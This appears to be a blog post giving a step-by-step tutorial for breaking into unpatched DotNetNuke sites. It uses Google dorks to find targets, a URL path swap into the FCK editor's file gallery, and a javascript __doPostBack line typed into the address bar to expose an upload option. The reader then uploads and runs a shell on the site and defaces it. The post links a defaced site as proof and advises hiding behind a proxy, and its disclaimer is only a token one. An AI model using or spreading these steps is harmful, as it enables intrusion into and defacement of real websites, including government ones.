This method is simple but many sites got hacked using this method including gov sites and military sites.
If server is not patched then you can easily upload your shell their and execute that shell as a result you can deface that site. but i recommend you to not deface sites , just use this info for your knowledge.
eg of this attack --> http://www.liadvantage.info/portals/0/hacked_by_00733.jpg
i think u have got.
Before going below make yourself sure that you are using a strong proxy server :|
1st Find The DNN
Go To Any Search Engine
Take Google
And Search This Dork
:inurl:/tabid/36/language/en-US/Defa
OR
Go To Any Search Engine
Take Google
And Search This Dork
:inurl:/tabid/36/language/en-US/Defa
OR
inurl : /portals/0/
See The Results And select any site as target
You Will See This Part In Every Site That You Searched For
/Home/tabid/36/Language/en-US/Default
Now Replace This With
/Providers/HtmlEditorProviders/Fck/f
You Will Enter In The Gallery Page
Now Select
File ( A File On Your Site )
At This Point Copy This Java Script And Paste It In The Address Bar
javascript:__doPostBack('ctlURL$cmdUpload','') {call doPostBack method to upload local files}
You Will Find The Upload Option
Select Root And Upload Your File
Your File Then Will Be In The Root
Then Put This In End Of URL
portals/0/yourfile.yourfile format
Your Done Enjoy !!!
You Will Find The Upload Option
Select Root And Upload Your File
Your File Then Will Be In The Root
Then Put This In End Of URL
portals/0/yourfile.yourfile format
Your Done Enjoy !!!
No comments:
Post a Comment